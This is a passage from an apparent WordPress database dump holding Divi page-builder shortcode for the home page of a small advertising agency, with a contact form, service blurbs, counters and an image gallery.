module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-29 19:05:28','2020-07-29 19:05:28','',134,'https://52.66.212.87/2020/07/29/134-revision-v1/',0,'revision','',0),(374,1,'2020-07-29 19:16:10','2020-07-29 19:16:10','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/Screenshot-2020-07-19-at-2.05.17-AM.png\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.1\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/63368-2.png\" alt=\"Why We\" title_text=\"Best Agency to choose\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.1\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" 